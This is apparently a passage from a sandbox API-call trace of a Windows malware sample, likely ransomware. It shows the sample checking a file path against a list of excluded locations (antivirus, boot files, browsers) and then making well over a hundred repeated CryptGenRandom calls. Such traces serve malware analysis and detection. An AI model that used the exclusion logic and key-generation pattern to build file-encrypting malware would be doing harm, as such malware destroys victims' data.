PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*\\AVAST Software\\*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*Atheros*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*Realtek*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*bootmgr*") returned 0 [0144.546] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*boot*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*boot*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*CONFIG.SYS*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*IO.SYS*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*MSDOS.SYS*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*NTDETECT.COM*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*ntldr*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*chrome*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*opera*") returned 0 [0144.547] PathMatchSpecW (pszFile="hwrcommonlm.dat", pszSpec="*firefox*") returned 0 [0144.547] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat", pszSpec="*") returned 1 [0144.547] strlen (_Str="NMoreira") returned 0x8 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.548] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 